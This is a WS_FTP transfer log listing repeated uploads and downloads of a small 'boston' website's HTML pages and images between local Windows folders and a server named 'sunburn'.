10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
